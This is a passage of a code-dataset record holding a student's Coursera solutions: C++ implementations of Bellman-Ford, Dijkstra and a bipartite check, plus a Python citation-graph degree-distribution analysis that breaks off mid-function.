"blob_id": "a4cb25dba1130e29a359e8a75b477446f997e8e0",
"content_id": "210a2f1672d0f0d1f7fe57ae88d4507ff5d04cf9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 7826,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 248,
"path": "/Algorithms on Graphs/Assignment4/shortest_path.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: shortest_path.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-17\r\n// description: Problem 3 of the fourth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given an directed graph with possibly negative edge weights and with \r\n//\t\t\t\tn vertices and m edges as well as its vertex s, compute the length of shortest paths\r\n//\t\t\t\tfrom s to all other vertices of the graph.\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tedges m for the graph (put a space between the two). The next lines contains two vertices u and v and \r\n//\t\t\t\tthe value of the edge weight from u to v. The last line contains the vertice for which you want to find\r\n//\t\t\t\tthe shortest path\r\n//\r\n//\t\t\t\tOutput: For all vertices i from 1 to n output the following on a separate line:\r\n//\t\t\t\t\t\t\t• “*”, if there is no path from s to u;\r\n//\t\t\t\t\t\t\t• “ - ”, if there is a path from s to u, but there is no shortest path from s to u(that is, the distance\r\n//\t\t\t\t\t\t\t\tfrom s to u is −∞);\r\n//\t\t\t\t\t\t\t• the length of a shortest path otherwise\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tshortest_path function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.12/2.00 sec, max memory used: 11.6/512 MB. \r\n\r\n#include <iostream>\r\n#include <limits>\r\n#include <vector>\r\n#include <queue>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\nusing std::priority_queue;\r\n\r\n// Finds the shortest path from a given vertice to every other vertice in the graph\r\n// \r\n// PRE: 1 ≤ n ≤ 10e3; 0 ≤ m ≤ 10e4; edge weights are integers of absolute value at most 10e9\r\n//\t\t(note that m = edges of directed graph adj and n = size of adj)\r\n// POST: updates the distance, reachable and shortest vectors that will be used in the main function\r\n//\t\t to output shortest path if any\r\n//\t\t\r\n// PARAM: adj = directed graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t cost = adjacency list storing edge weights of all the edges leaving each vertice\r\n//\t\t s = vertice of a graph from which we want to find the shortest path to every other vertice of the graph\r\n//\t\t distance = stores the minimum distance from s to all other vertices\r\n//\t\t reachable = keeps track of the reachablity of all vertices from s.\r\n//\t\t shortest = keeps track of the existiblity of shortest path for each vertice from s. If the shortes path \r\n//\t\t\t\t\t is negative infinity then, then shortes path does not exist.\r\n\r\nvoid shortest_paths(vector<vector<int> > &adj, vector<vector<int> > &cost, int s, vector<long long> &distance, vector<int> &reachable, vector<int> &shortest) {\r\n\r\n\tint i = 0;\r\n\tqueue<int> myQueue;\r\n\tdistance[s] = 0;\r\n\t\r\n\tmyQueue.push(s);\r\n\tint w;\r\n\r\n\t// run a breath first search start from s and mark all the reachable vertices from s\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\tw = myQueue.front();\r\n\t\t//stores true for all reachable vertices\r\n\t\treachable[w] = 1;\r\n\t\tmyQueue.pop();\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\t\t\tif (reachable[adj[w][v]]== 0) {\r\n\r\n\t\t\t\tmyQueue.push(adj[w][v]);\r\n\t\t\t\t//stores true for all reachable vertices\r\n\t\t\t\treachable[adj[w][v]] = 1;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t// run Bellman-Ford algorthm n times, and store all the vertice whose distance was updated at the nth iteration in a queue\r\n\twhile (i < adj.size()) {\r\n\r\n\t\tfor (vector<int>::size_type u = 0; u < adj.size(); u++) {\r\n\r\n\t\t\t//if the distance value is infinity i.e. the vertice has not yet been visited\r\n\t\t\tif (distance[u] < std::numeric_limits<long long>::max()) {\r\n\r\n\t\t\t\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\r\n\t\t\t\t\tif (distance[adj[u][v]] == std::numeric_limits<long long>::max() || distance[adj[u][v]] > distance[u] + cost[u][v]) {\r\n\r\n\t\t\t\t\t\tdistance[adj[u][v]] = distance[u] + cost[u][v];\r\n\r\n\t\t\t\t\t\t//at the nth interation, store all vertices in a queue since these are part of the negative cycle\r\n\t\t\t\t\t\tif (i == adj.size() - 1) {\r\n\t\t\t\t\t\t\tmyQueue.push(adj[u][v]);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\r\n\r\n\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\t\t++i;\r\n\t}\r\n\r\n\t// for all vertices whose distance was updated on the nth iteration of the Bellman-Ford, mark those and all \r\n\t// the reachable vertice from these as not having any shortest path\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\tw = myQueue.front();\r\n\t\tshortest[w] = 0;\r\n\t\tmyQueue.pop();\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\t\t\tif (shortest[adj[w][v]] == 1) {\r\n\t\t\t\tmyQueue.push(adj[w][v]);\r\n\t\t\t\tshortest[adj[w][v]] = 0;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\t}\r\n\r\n\r\n\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m, s;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<vector<int> > cost(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y, w;\r\n\t\tstd::cin >> x >> y >> w;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tcost[x - 1].push_back(w);\r\n\t}\r\n\tstd::cin >> s;\r\n\ts--;\r\n\tvector<long long> distance(n, std::numeric_limits<long long>::max());\r\n\tvector<int> reachable(n, 0);\r\n\tvector<int> shortest(n, 1); // 1 represents shortest path exists, 0 otherwise\r\n\tshortest_paths(adj, cost, s, distance, reachable, shortest);\r\n\tfor (int i = 0; i < n; i++) {\r\n\t\tif (!reachable[i]) {\r\n\t\t\tstd::cout << \"*\\n\";\r\n\t\t}\r\n\t\telse if (!shortest[i]) {\r\n\t\t\tstd::cout << \"-\\n\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tstd::cout << distance[i] << \"\\n\";\r\n\t\t}\r\n\t}\r\n\t\r\n\t// A test case to check if the shortest_path function works. These are commented since the \r\n\t// assignment requires the shortest_path.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\t\r\n\tint n = 6;\r\n\tint s = 1 - 1;\r\n\tvector<vector<int> > adj1(n, vector<int>());\r\n\tvector<vector<int> > cost1(n, vector<int>());\r\n\tvector<long long> distance1(n, std::numeric_limits<long long>::max());\r\n\tvector<int> reachable1(n, 0);\r\n\tvector<int> shortest1(n, 1); // 1 represents shortest path exists, 0 otherwise\r\n\t\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tcost1[1 - 1].push_back(10);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tcost1[2 - 1].push_back(5);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tcost1[1 - 1].push_back(100);\r\n\r\n\tadj1[3 - 1].push_back(5 - 1);\r\n\tcost1[3 - 1].push_back(7);\r\n\r\n\tadj1[5 - 1].push_back(4 - 1);\r\n\tcost1[5 - 1].push_back(10);\r\n\r\n\tadj1[4 - 1].push_back(3 - 1);\r\n\tcost1[4 - 1].push_back(-18);\r\n\t\r\n\tadj1[6 - 1].push_back(1 - 1);\r\n\tcost1[6 - 1].push_back(-1);\r\n\r\n\tshortest_paths(adj1, cost1, s, distance1, reachable1, shortest1);\r\n\tfor (int i = 0; i < n; i++) {\r\n\t\tif (!reachable1[i]) {\r\n\t\t\tstd::cout << \"*\\n\";\r\n\t\t}\r\n\t\telse if (!shortest1[i]) {\r\n\t\t\tstd::cout << \"-\\n\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tstd::cout << distance1[i] << \"\\n\";\r\n\t\t}\r\n\t}\r\n\r\n\t//test2\r\n\r\n\tn = 5;\r\n\ts = 4 - 1;\r\n\tvector<vector<int> > adj2(n, vector<int>());\r\n\tvector<vector<int> > cost2(n, vector<int>());\r\n\tvector<long long> distance2(n, std::numeric_limits<long long>::max());\r\n\tvector<int> reachable2(n, 0);\r\n\tvector<int> shortest2(n, 1); // 1 represents shortest path exists, 0 otherwise\r\n\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\tcost2[1 - 1].push_back(1);\r\n\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\tcost2[4 - 1].push_back(2);\r\n\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\tcost2[2 - 1].push_back(2);\r\n\r\n\tadj2[3 - 1].push_back(1 - 1);\r\n\tcost2[3 - 1].push_back(-5);\r\n\r\n\tstd::cout << std::endl;\r\n\r\n\tshortest_paths(adj2, cost2, s, distance2, reachable2, shortest2);\r\n\tfor (int i = 0; i < n; i++) {\r\n\t\tif (!reachable2[i]) {\r\n\t\t\tstd::cout << \"*\\n\";\r\n\t\t}\r\n\t\telse if (!shortest2[i]) {\r\n\t\t\tstd::cout << \"-\\n\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\tstd::cout << distance2[i] << \"\\n\";\r\n\t\t}\r\n\t}\r\n\r\n\r\n\t************************************************************************************************/\r\n}\r\n"
},
{
"alpha_fraction": 0.5782669186592102,
"alphanum_fraction": 0.6127443313598633,
"avg_line_length": 31.48969078063965,
"blob_id": "e89a4223adbba37a20ddce6d5721067e62bfac43",
"content_id": "e31982326e8c7e02bed136a24ce96ab492517695",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6509,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 194,
"path": "/Algorithms on Graphs/Assignment4/dijkstra.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: dijkstra.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-17\r\n// description: Problem 1 of the fourth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given an directed graph with positive edge weights and with n vertices and m edges as well as two\r\n//\t\t\t\tvertices u and v, compute the weight of a shortest path between u and v(that is, the minimum total\r\n//\t\t\t\tweight of a path from u to v).\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tedges m for the graph (put a space between the two). The next lines contains two vertices u and v and \r\n//\t\t\t\tthe value of the edge weight from u to v. The last line contains the vertice u and v for which we want to \r\n//\t\t\t\tfind the minimum distance from u to v. \r\n//\r\n//\t\t\t\tOutput: Output the minimum weight of a path from u to v, or −1 if there is no path\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tdistance function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.14/2.00 sec, max memory used: 41.4/512 MB. \r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <queue>\r\n#include <functional>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\nusing std::pair;\r\n\r\n// Used for creating a min priority queue i.e the top of the queue will contain\r\n// the smallest element.\r\nstruct pri\r\n{\r\n\tint operator() (const pair<int, int>&p1, const pair<int, int>&p2)\r\n\t{\r\n\t\treturn (p1.second > p2.second);\r\n\t}\r\n};\r\n\r\n// Performs breath first search to finds the minimum weight of the path from s to t or returns -1\r\n// if no path exists\r\n// \r\n// PRE: 1 ≤ n ≤ 10e3; 0 ≤ m ≤ 10e5; t != s; 0 <= t,s < n; edge weights are non-negative integers not\r\n// exceeding 10e3 (note that m = edges of undirected graph adj and n = size of adj)\r\n// POST: return the shortest path between s and t if there exists one or -1 otherwise if s and t are not connected\r\n// PARAM: adj = undirected graph represented in adjacancey list with n vertices and m edges where n is adj.size() \r\n//\t\t cost = adjacency list storing edge weights of all the edges leaving each vertice\r\n//\t\t s = a vertice of the graph adj\r\n//\t\t t = another vertice of the graph adj (t != s)\r\n\r\nint distance(vector<vector<int> > &adj, vector<vector<int> > &cost, int s, int t) {\r\n\r\n\t// intialize a min priority queue that stores a vector of pairs with first value of\r\n\t// the pair being the vertice number while second being the current minimum distance\r\n\t// to reach that vertice\r\n\tstd::priority_queue<int, std::vector< pair<int,int> >, pri > min_queue;\r\n\t// intialize a vector of pairs of int and bool where the first value represents the\r\n\t// current minimum distance to reach that vertice from s and second value stores a bool \r\n\t// that represent whether that vertice has been visited yet.\r\n\tvector<pair<int, bool>> dist(adj.size(), std::make_pair(0, false));\r\n\t//set the start vertice s as visited \r\n\tdist[s].second = true;\r\n\r\n\t//push the start vertice onto the queue\r\n\tmin_queue.push(std::make_pair(s, dist[s].first));\r\n\t//intialize a variable to keep track of the current vertice\r\n\tint w;\r\n\r\n\r\n\twhile (!min_queue.empty())\r\n\t{\r\n\t\tw = min_queue.top().first;\r\n\t\t//if the current vertice is the same as the target vertice, return the distance of that vertice. \r\n\t\t//this is the shorted distance from s to t\r\n\t\tif (w == t)\r\n\t\t\treturn dist[t].first;\r\n\t\tmin_queue.pop();\r\n\r\n\t\t//for all vertices reachable from w\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[w].size(); v++) {\r\n\r\n\t\t\t// if the current vertice has not yet been visited or the current minimum distance of that vertice \r\n\t\t\t// (s to the vertice) is greater than the distance at w + distance from w to that vertice\r\n\t\t\tif (dist[adj[w][v]].second == false || dist[adj[w][v]].first > dist[w].first + cost[w][v]) {\r\n\r\n\t\t\t\t//mark it as visited\r\n\t\t\t\tdist[adj[w][v]].second = true;\r\n\t\t\t\t//update the distance of this vertice from w. \r\n\t\t\t\tdist[adj[w][v]].first = dist[w].first + cost[w][v];\r\n\t\t\t\tmin_queue.push(std::make_pair(adj[w][v], dist[adj[w][v]].first));\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn -1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tvector<vector<int> > cost(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y, w;\r\n\t\tstd::cin >> x >> y >> w;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tcost[x - 1].push_back(w);\r\n\t}\r\n\tint s, t;\r\n\tstd::cin >> s >> t;\r\n\ts--, t--;\r\n\tstd::cout << distance(adj, cost, s, t);\r\n\r\n\t// Few test case to check if the distance function works. These are commented since the \r\n\t// assignment requires the bfs.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/**************************************************************************************\r\n\t\r\n\t/*\r\n\t//test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tvector<vector<int> > cost1(4, vector<int>());\r\n\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tcost1[1 - 1].push_back(1);\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tcost1[4 - 1].push_back(2);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tcost1[2 - 1].push_back(2);\r\n\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\tcost1[1 - 1].push_back(5);\r\n\r\n\tstd::cout << distance(adj1, cost1, 1-1, 3-1) << std::endl;\r\n\r\n\t//test 2\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tvector<vector<int> > cost2(5, vector<int>());\r\n\r\n\tadj2[1 - 1].push_back(2 - 1);\r\n\tcost2[1 - 1].push_back(4);\r\n\r\n\tadj2[1 - 1].push_back(3 - 1);\r\n\tcost2[1 - 1].push_back(2);\r\n\r\n\tadj2[2 - 1].push_back(3 - 1);\r\n\tcost2[2 - 1].push_back(2);\r\n\r\n\tadj2[3 - 1].push_back(2 - 1);\r\n\tcost2[3 - 1].push_back(1);\r\n\r\n\tadj2[2 - 1].push_back(4 - 1);\r\n\tcost2[2 - 1].push_back(2);\r\n\r\n\tadj2[3 - 1].push_back(5 - 1);\r\n\tcost2[3 - 1].push_back(4);\r\n\r\n\tadj2[5 - 1].push_back(4 - 1);\r\n\tcost2[5 - 1].push_back(1);\r\n\r\n\tadj2[2 - 1].push_back(5 - 1);\r\n\tcost2[2 - 1].push_back(3);\r\n\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\tcost2[3 - 1].push_back(4);\r\n\r\n\tstd::cout << distance(adj2, cost2, 1 - 1, 5 - 1) << std::endl;\r\n\r\n\t//test 3\r\n\tvector<vector<int> > adj3(3, vector<int>());\r\n\tvector<vector<int> > cost3(3, vector<int>());\r\n\r\n\tadj3[1 - 1].push_back(2 - 1);\r\n\tcost3[1 - 1].push_back(7);\r\n\r\n\tadj3[1 - 1].push_back(3 - 1);\r\n\tcost3[1 - 1].push_back(5);\r\n\r\n\tadj3[2 - 1].push_back(3 - 1);\r\n\tcost3[2 - 1].push_back(2);\r\n\r\n\tstd::cout << distance(adj3, cost3, 3 - 1, 2 - 1) << std::endl;\r\n\r\n\tsystem(\"PAUSE\");\r\n\t*/\r\n}\r\n"
},
{
"alpha_fraction": 0.5348203182220459,
"alphanum_fraction": 0.5712515711784363,
"avg_line_length": 27.45255470275879,
"blob_id": "2bb65dfbb308760d78acb55623a7bec963997369",
"content_id": "d3c0d47958483e42aee6aca565bb2b2f18ad102c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4045,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 137,
"path": "/Algorithms on Graphs/Assignment3/bipartite.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: bipartite.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-10\r\n// description: Problem 2 of the third assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was : Given an undirected graph with n vertices and m edges, check whether it is bipartite.\r\n//\r\n//\t\t\t\tInput Format. A graph is given in the standard format i.e on the first line input the number of nodes n\r\n//\t\t\t\tand edges m for the graph (put a space between the two). \r\n//\r\n//\t\t\t\tOutput: Output 1 if the graph is bipartite and 0 otherwise.\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided but implementation of\r\n//\t\t\t\tbipartite function had to be completed\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.17/2.00 sec, max memory used: 41.9/513 MB. \r\n\r\n\r\n#include <iostream>\r\n#include <vector>\r\n#include <queue>\r\n\r\nusing std::vector;\r\nusing std::queue;\r\n\r\n// Finds whether the given graph is bipartite. See http://mathworld.wolfram.com/BipartiteGraph.html\r\n// for details on bipartite graph\r\n//\r\n// PRE: 1 ≤ n ≤ 10e5; 0 ≤ m ≤ 10e5; t != s; 0 < t,s < n -1 (note that m = edges of undirected graph\r\n//\t\tadj and n = size of adj)\r\n// POST: return 1 if the graph adj is bipartite or 0 otherwise\r\n// PARAM: adj = an undirected graph represented in adjacancey list with n vertices and 2*m edges where n is adj.size() \r\n\r\nint bipartite(vector<vector<int> > &adj) {\r\n\r\n\tqueue<int> myQueue;\r\n\r\n\t//white color (first color) is represented by 1, black (second color) by 0 and nodes\r\n\t//that are not yet colored are represented by -1\r\n\tvector<int> colors(adj.size(), -1);\r\n\r\n\tmyQueue.push(0);\r\n\t//colors source node white\r\n\tcolors[0] = 1;\r\n\r\n\tint u;\r\n\r\n\t//run BFS while queue is not empty\r\n\twhile (!myQueue.empty())\r\n\t{\r\n\t\t//store the node at front and dequeue it\r\n\t\tu = myQueue.front();\r\n\t\tmyQueue.pop();\r\n\r\n\t\t//explore all nodes adjacent to u\r\n\t\tfor (vector<int>::size_type v = 0; v < adj[u].size(); v++) {\r\n\r\n\t\t\t//if the node adjacent to u is not colored\r\n\t\t\tif (colors[adj[u][v]] == -1) {\r\n\r\n\t\t\t\t//assign an alternate colors.\r\n\t\t\t\tcolors[adj[u][v]] = 1 - colors[u];\r\n\t\t\t\tmyQueue.push(adj[u][v]);\r\n\t\t\t}\r\n\t\t\t//else if the adjacent node is the same color as u, then the graph cannot be bipartite\r\n\t\t\telse if (colors[adj[u][v]] == colors[u])\r\n\t\t\t\treturn 0;\r\n\r\n\t\t}\r\n\t}\r\n\r\n\treturn 1;\r\n}\r\n\r\nint main() {\r\n\t\r\n\tint n, m;\r\n\tstd::cin >> n >> m;\r\n\tvector<vector<int> > adj(n, vector<int>());\r\n\tfor (int i = 0; i < m; i++) {\r\n\t\tint x, y;\r\n\t\tstd::cin >> x >> y;\r\n\t\tadj[x - 1].push_back(y - 1);\r\n\t\tadj[y - 1].push_back(x - 1);\r\n\t}\r\n\tstd::cout << bipartite(adj);\r\n\t\r\n\r\n\t// Few test case to check if the bipartite function works. These are commented since the \r\n\t// assignment requires the bipartite.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/******************************************************************************************\r\n\t//Test 1\r\n\tvector<vector<int> > adj1(4, vector<int>());\r\n\tadj1[1 - 1].push_back(2 - 1);\r\n\tadj1[2 - 1].push_back(1 - 1);\r\n\r\n\tadj1[4 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(4 - 1);\r\n\r\n\tadj1[2 - 1].push_back(3 - 1);\r\n\tadj1[3 - 1].push_back(2 - 1);\r\n\r\n\tadj1[3 - 1].push_back(1 - 1);\r\n\tadj1[1 - 1].push_back(3 - 1);\r\n\r\n\tif (bipartite(adj1) == 0)\r\n\t\tstd::cout << \"Test 1 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 1 failed\" << std::endl;\r\n\r\n\t//test2\r\n\tvector<vector<int> > adj2(5, vector<int>());\r\n\tadj2[5 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(5 - 1);\r\n\r\n\tadj2[4 - 1].push_back(2 - 1);\r\n\tadj2[2 - 1].push_back(4 - 1);\r\n\r\n\tadj2[3 - 1].push_back(4 - 1);\r\n\tadj2[4 - 1].push_back(3 - 1);\r\n\r\n\tadj2[1 - 1].push_back(4 - 1);\r\n\tadj2[4 - 1].push_back(1 - 1);\r\n\r\n\tif (bipartite(adj2) == 1)\r\n\t\tstd::cout << \"Test 2 passed\" << std::endl;\r\n\telse\r\n\t\tstd::cout << \"Test 2 failed\" << std::endl;\r\n\r\n\tsystem(\"PAUSE\");\r\n\t*******************************************************************************************************/\r\n\r\n}\r\n"
},
{
"alpha_fraction": 0.7461465001106262,
"alphanum_fraction": 0.7517877221107483,
"avg_line_length": 47.7829475402832,
"blob_id": "6aa1e988ca43ccdf2f1a3410a99c1f4d3f2dd6e4",
"content_id": "c189e48b7e73401fe08d596f7e6c319fa348fe10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12586,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 258,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/alg_application1_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAnalyze the structure of graphs generated by citation patterns from scientific papers\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport parse_graph\nimport alg_project1_solution as alg_proj1_sol\nimport alg_dpa_trial as dpa\n\n##### Q1 Solution #####\n# For this question, your task is to load a provided citation graph for 27,770\n# high energy physics theory papers. This graph has 352,768 edges. You should\n# use the following code to load the citation graph as a dictionary. In\n# CodeSkulptor, loading the graph should take 5-10 seconds. (For an extra\n# challenge, you are welcome to write your own function to create the citation\n# graph by parsing this text representation of the citation graph.)\n#\n# Your task for this question is to compute the in-degree distribution for this\n# citation graph. Once you have computed this distribution, you should normalize\n# the distribution (make the values in the dictionary sum to one) and then\n# compute a log/log plot of the points in this normalized distribution. How you\n# create this point plot is up to you. You are welcome to use a package such as\n# matplotlib for desktop Python, use the simpleplot module in CodeSkulptor, or\n# use any other method that you wish\n\n# load the graph from the text file\ncit_graph = parse_graph.load_graph(\"citation_graph.txt\")\n\n# get the unnormalized in degree distribution\nin_deg_dist = alg_proj1_sol.in_degree_distribution(cit_graph)\n\n# normalize the in degree distribution\nsum_val = sum(in_deg_dist.values())\nin_deg_dist.update((degree, freq / float(sum_val)) for degree, freq in in_deg_dist.items())\n\n# draw the loglog plot of the normalized in degree distribution of the citation graphe\nplt.figure(0)\nplt.loglog(in_deg_dist.keys(), in_deg_dist.values(), basex=10, basey=10, linestyle='None',\n marker='.', markeredgecolor='blue')\nplt.title('loglog plot of in-degree distribution of citation Graph')\nplt.xlabel('number of citations')\nplt.ylabel('fraction of papers')\nplt.grid()\nplt.ylim(None, 1)\nplt.show()\n#plt.savefig(\"Q1_loglog_degree_dist_citgraph.png\")\n\n##### Q2 Solution #####\n# In Homework 1, you saw Algorithm ER for generating random graphs and reasoned\n# analytically about the properties of the ER graphs it generates. Consider the\n# simple modification of the algorithm to generate random directed graphs: For\n# every ordered pair of distinct nodes (i, j), the modified algorithm adds the\n# directed edge from i to j with probability p.\n#\n# For this question, your task is to consider the shape of the in-degree\n# distribution for an ER graph and compare its shape to that of the physics\n# citation graph. In the homework, we considered the probability of a specific\n# in-degree, k, for a single node. Now, we are interested in the in-degree\n# distribution for the entire ER graph. To determine the shape of this\n# distribution, you are welcome to compute several examples of in-degree\n# distributions or determine the shape mathematically.\n#\n# Once you have determined the shape of the in-degree distributions for ER graphs,\n# compare the shape of this distribution to the shape of the in-degree distribution\n# for the citation graph. When answering this question, make sure to address the\n# following points:\n#\n# Q2.1: Is the expected value of the in-degree the same for every node in an ER graph?\n# Please answer yes or no and include a short explanation for your answer.\n\n# Ans: yes it same for all nodes since the presence of an edge is independent of\n# all other edges i.e it is independent of the current structure of the graph\n# The expected value of in-degree is given by p * (n-1)\n\n# Q2.2: What does the in-degree distribution for an ER graph look like?\n# Provide a short written description of the shape of the distribution.\n\n# Ans: we know that the probability that a given node has degree k is given by\n# a binomial distribution as seen in the homework. Thus as p -> 0 (probability\n# p becomes smaller), we see more nodes with smaller in-degree and thus\n# the in-degree distribution shape looks like a bell curve skewed towards the\n# left i.e near in-degree 0. As p -> 1, we get more nodes with higher in-degree\n# and the shape is increasing curve with most points near the higher\n# in-degree region. For large number of nodes, and small p, this becomes\n# a symmetric bell shaped curve and approaches a normal distribution\n\n# Q2.3: Does the shape of the in-degree distribution plot for ER look similar\n# to the shape of the in-degree distribution for the citation graph?\n# Provide a short explanation of the similarities or differences.\n# Focus on comparing the shape of the two plots as discussed in the class page on\n# \"Creating, formatting, and comparing plots\".\n\n# Ans: As mentioned in answer of Q2.2, the shape for the ER in-degree approaches\n# a bell-shaped curve for large N values and small p. However, for the citation\n# graph it is a decreasing curve with majority of point located near in-degree\n# of zero.\n\n##### Q3 Solution #####\n# We next consider a different process for generating synthetic directed graphs.\n# In this process, a random directed graph is generated iteratively, where in\n# each iteration a new node is created, added to the graph, and connected to a\n# subset of the existing nodes. This subset is chosen based on the in-degrees\n# of the existing nodes. More formally, to generate a random directed graph in\n# this process, the user must specify two parameters: nn, which is the final\n# number of nodes, and m (where m <= n), which is the number of existing\n# nodes to which a new node is connected during each iteration. Notice that m\n# is fixed throughout the procedure.\n#\n# The algorithm starts by creating a complete directed graph on mm nodes.\n# (Note, you've already written the code for this part in the Project.) Then,\n# the algorithm grows the graph by adding n-m nodes, where each new node is\n# connected to m nodes randomly chosen from the set of existing nodes. As an\n# existing node may be chosen more than once in an iteration, we eliminate\n# duplicates (to avoid parallel edges); hence, the new node may be connected\n# to fewer than m existing nodes upon its addition.\n\n# The algorithm is called Algorithm DPA (note that the m in the input is a\n# parameter that is specified to this algorithm, and it does not denote the\n# total number of edges in the resulting graph).\n\n# For this question, we will choose values for n and m that yield a DPA\n# graph whose number of nodes and edges is roughly the same to those of the\n# citation graph. For the nodes, choosing n to be the number of nodes as\n# the citation graph is easy. Since each step in the DPA algorithm adds m\n# edges to the graph, a good choice for m is an integer that is close to\n# the average out-degree of the physics citation graph.\n\n# For this question, provide numerical values for n and m that you will\n# use in your construction of the DPA graph.\n\n# calculate n, i.e the number of nodes in citation graph for DPA algorithm\nn_nodes = len(cit_graph.keys())\n# calculate m, i.e the average out-degree in citation graph for DPA algorithm\nm_nodes = int(round(np.mean([len(neighbors) for neighbors in cit_graph.values()])))\n\nprint \"Q3 Solution:\"\nprint \"n = \", n_nodes\nprint \"m = \", m_nodes\n\n##### Q4 Solution #####\n# Your task for this question is to implement the DPA algorithm, compute a DPA\n# graph using the values from Question 3, and then plot the in-degree distribution\n# for this DPA graph. Creating an efficient implementation of the DPA algorithm\n# from scratch is surprisingly tricky. The key issue in implementing the algorithm\n# is to avoid iterating through every node in the graph when executing Line 6\n# of the provided pseudocode. Using a loop to implement Line 6 leads to implementations\n# that require on the order of 30 minutes in desktop Python to create a DPA graph with\n# 28000 nodes.\n#\n# To avoid this bottleneck, you are welcome to use this provided code that implements\n# a DPATrial class.\n#\n# Once you have created a DPA graph of the appropriate size, compute a (normalized)\n# log/log plot of the points in the graph's in-degree distribution\n\n# write the function for generating DPA graphs\ndef alg_dpa(n_num_nodes, m_num_nodes):\n 